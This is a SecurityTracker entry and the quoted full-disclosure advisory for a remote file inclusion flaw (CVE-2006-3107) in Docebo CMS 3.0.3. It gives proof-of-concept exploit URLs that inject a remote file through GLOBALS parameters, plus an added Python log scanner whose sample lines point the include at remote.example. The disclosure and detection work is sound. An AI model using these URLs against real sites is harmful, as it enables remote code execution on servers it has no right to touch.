SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   DoceboLMS
Vendors:   Docebolms.org
Docebo Include File Flaw in GLOBALS['where_framework'] and GLOBALS['where_cms'] Parameters Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016259
SecurityTracker URL:  http://securitytracker.com/id/1016259
CVE Reference:   CVE-2006-3107
Updated:  May 21 2009
Original Entry Date:  Jun 9 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.0.3
Description:   A vulnerability was reported in Docebo. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the GLOBALS['where_framework'] and GLOBALS['where_cms'] parameters. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

http://[target]/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url]
http://[target]/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url]
http://[target]/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url]

Federico Fazzi discovered this vulnerability.
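
A log check for the request pattern described above, added here as an example; it is not part of the SecurityTracker entry or of the original advisory. The log lines, client addresses and the host remote.example are constructed, and the request paths leave out the [dc_path] placeholder.

```python
import re
from urllib.parse import parse_qsl

# Parameter names from the advisory. PHP variable names are case-sensitive,
# so the match is exact.
WATCHED = {"GLOBALS[where_framework]", "GLOBALS[where_cms]"}
# A value beginning with a URL scheme points the include at a remote location.
REMOTE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
# Request line of a common/combined log format entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan(lines):
    """Return (line_no, param, value, is_remote) for each watched parameter."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        m = REQUEST.search(line)
        if not m:
            continue
        _, _, query = m.group(1).partition("?")
        # parse_qsl percent-decodes, so GLOBALS%5Bwhere_cms%5D is caught too.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key in WATCHED:
                hits.append((line_no, key, value, bool(REMOTE.match(value))))
    return hits

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jun/2006:06:10:00 +0000] '
    '"GET /doceboCms/index.php?id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Jun/2006:06:11:12 +0000] '
    '"GET /doceboCms/admin/modules/news/news_class.php'
    '?GLOBALS[where_framework]=http://remote.example/x HTTP/1.1" 200 310',
    '198.51.100.7 - - [09/Jun/2006:06:11:15 +0000] '
    '"GET /doceboCms/admin/modules/block_media/util.media.php'
    '?GLOBALS%5Bwhere_cms%5D=ftp%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 290',
    '192.0.2.44 - - [09/Jun/2006:06:12:01 +0000] '
    '"GET /doceboCms/admin/modules/content/content_class.php'
    '?GLOBALS[where_framework]=/tmp HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for line_no, key, value, remote in scan(SAMPLE_LOG):
        kind = "remote include target" if remote else "local path override"
        print(f"line {line_no}: {key} = {value!r} ({kind})")
```

With register_globals enabled, the same variables can also be populated from a POST body or a cookie, which an access log does not record, so this check covers only the GET form shown in the demonstration URLs.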

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.docebolms.org/doceboCms/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Docebo CMS 3.0.3, Remote command execution

-----------------------------------------------------
Advisory id: FSA:007

Author:    Federico Fazzi
Date:      09/06/2006, 6:10
Synthesis: Docebo CMS 3.0.3, Remote command execution
Type:      high
Product:   http://www.docebolms.org/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occurred in news_class.php,

include_once($GLOBALS['where_framework']."/lib/lib.listview.php");
include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");
include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");

Error occurred in content_class.php,

include_once($GLOBALS['where_framework']."/lib/lib.listview.php");
include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");
include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");

Error occurred in util.media.php,

include_once($GLOBALS["where_cms"]."/admin/modules/media/media_class.php");

Users can include a remote file because
$GLOBALS['where_framework'] and $GLOBALS['where_cms']
aren't sanitized.

2) Proof of concept:

http://example/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url]
http://example/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url]
http://example/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url]

3) Solution:

Include the file where $GLOBALS[*] are declared.
